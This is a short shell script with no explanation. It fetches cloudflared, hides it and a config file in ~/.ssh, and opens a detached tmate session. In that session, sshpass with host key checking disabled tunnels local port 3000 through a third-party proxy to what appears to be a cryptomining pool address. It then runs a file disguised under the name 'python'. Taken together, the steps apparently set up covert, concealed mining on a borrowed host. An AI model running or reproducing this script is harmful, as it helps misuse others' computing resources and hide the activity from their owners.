wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 && mv cloudflared-linux-amd64 cloudflared && chmod +x cloudflared | |
mkdir ~/.ssh | |
cp ./cloudflared ~/.ssh/ | |
cp ./config ~/.ssh/ | |
tmate -S tmate.sock1 new-session -d 'sshpass -p " " ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 ms@proxy1.adi999.my.id' && tmate -S tmate.sock1 wait tmate-ready | |
chmod +x python | |
bash python3 |